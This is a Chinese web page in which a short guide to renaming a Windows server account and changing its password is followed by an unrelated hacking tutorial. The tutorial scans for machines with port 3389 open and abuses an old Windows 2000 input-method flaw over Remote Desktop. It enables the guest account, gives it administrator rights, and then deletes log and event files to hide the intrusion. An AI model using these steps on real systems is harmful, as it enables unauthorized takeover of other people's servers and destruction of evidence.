常用的方法： 第一:修改伺服器的使用者名稱 遠端登入伺服器右擊我的電腦點選管理點選本地使用者和組點選使用者右擊要修改的使用者名稱點選重新命名 就可以改成想要的使用者名稱了。 第二：修改伺服器的密碼： 遠端登入伺服器滑鼠右擊我的電腦右擊 管理本地使用者和組使用者找到你的那個管理員賬號，右擊進行設定密碼。 會彈出個提示WINDOWS的一個安全警告，並不影響你的使用。如果你真的擔心資料丟失的話，那麼建議你更改後就重啟電腦，這樣你在更改密碼後的操作可以保證不會丟失。

這是老漏洞了,但對於新手來說很好用,而且事實證明現在仍有很多的機子有這種漏洞 OK我們開始 : 先用掃描器掃描有3389埠開放的主機.我本人比較喜歡用流光5.0掃,我就講解用流光掃吧 開啟流光5.0,點選[探測]->掃描POP3/FTP/NT/SQL主機在彈出來的對話方塊中輸入掃描範圍,然後選擇主機型別為IIS/FRONT/PAGE或者直接在這裡輸入埠號3389,這樣就能掃出開啟3389的主機,這裡只能入侵WINDOWS2000. 用3389.EXE連線,或者用WINDOWSXP自帶的遠端登陸在執行輸入mstsc,輸入主機IP,點選連線,按ctrl+shift調出全拼輸入法（其他似乎不行），用滑鼠右鍵點選微軟圖示,如果其幫助選單發灰，就趕快趕下家吧（人家打補丁了^_^）. 點幫助，點輸入法入門；在彈出的視窗中在"選項"選單上點右鍵(也就是視窗的最上方的藍條)--->跳轉到URL"，輸入：c:\winnt\system32\,如果不能確定它的目錄裝在那個盤下,因為有些是裝的雙系統.可以命令FILL:\\C:來杳看目錄.好,現在跳轉到了c:\winnt\system32\下,找到NET.EXE對其建立一個快捷方式,好找到快捷方式右擊-->屬性-->在目標C:\WINDOWS\system32\net.exe後加入 user guest /active:yes 相當於net user guest /active:yes 啟用GUEST帳戶,也可以建立一個新帳號,不過本人喜歡用GUEST不容易被發現. 然後點確定,再執行快捷方式,然後再開啟屬性在目標然後C:\WINDOWS\system32\net.exe USER GUEST 密碼,相當與NET USER GUEST 密碼,更改GUEST的密碼,再確定,執行快捷方式,再再開啟屬性,在目標C:\WINDOWS\system32\net.exe LOCALGROUP ADMINISTRATORS GUEST /ADD 把GUEST加入ADMINISTRATORS組,再執行快捷方式. 退出3389連線,再重新連線,輸入剛的帳號與密碼,就能連線了. 最後記得滅掉自已的尾巴 刪除連線檔案 del+C:\winnt\system32\logfiles\*.* del+C:\winnt\ssytem32\config\*.evt del+C:\winnt\system32\dtclog\*.* del+C:\winnt\system32\*.log del+C:\winnt\system32\*.txt del+C:\winnt\*.txt del+C:\winnt\*.log